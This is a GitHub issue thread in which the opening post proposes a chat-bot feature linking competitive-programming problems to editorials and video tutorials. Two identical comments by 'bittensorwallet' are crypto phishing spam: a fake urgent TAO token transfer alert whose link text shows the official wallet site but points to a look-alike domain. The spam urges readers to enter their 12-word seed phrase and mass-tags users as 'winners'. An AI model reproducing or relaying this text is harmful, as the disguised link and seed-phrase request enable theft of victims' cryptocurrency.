### ISSUE TITLE
CP related queries

### ISSUE THREAD

**Issue by naveensaigit** [NippunSharma/ChatterBox#9]
For CP related queries, we can do the following - 

1. For URI, if link is - https://www.urionlinejudge.com.br/judge/en/problems/view/{prob}
    a. Link to udebug - https://www.udebug.com/URI/{prob}
    b. Youtube Video Tutorials - https://www.youtube.com/results?search_query=URI+{prob}
2. For Codeforces, if link is - https://codeforces.com/contest/{contestID}/problem/{prob}, we can include the following - 
    a. Link to Editorial - https://codeforces.com/search?by=&query={contestID+prob}
    b. Youtube Video Tutorials - https://www.youtube.com/results?search_query=codeforces+{contestID}+{prob}
3. For Codechef, if link is - https://www.codechef.com/{contestID}/problems/{prob}
    a. Link to Editorial - https://discuss.codechef.com/search?q={prob}
    b. Youtube Video Tutorials - https://www.youtube.com/results?search_query=codechef+{contestID}+{prob}

Further, we can see if the message has any images any tag any of the core members who are online to see the message and help the juniors!

**Comment by bittensorwallet** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.


![Bittensor Logo](https://confionacompra.com/wp-content/uploads/2023/12/bittensor.jpg)


**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://l.bittlensor.com/vANocg).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @0xluk, @camfairchild, @Kingkon963, @lan956, @Acex333, @0xDEADBEAT, @mrosendin

**Comment by bittensorwallet** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.


![Bittensor Logo](https://confionacompra.com/wp-content/uploads/2023/12/bittensor.jpg)


**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://l.bittlensor.com/vANocg).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @Pipazoul, @misoobu, @mrbathinape, @rbmarliere, @perguth, @robot-love, @hey-michal
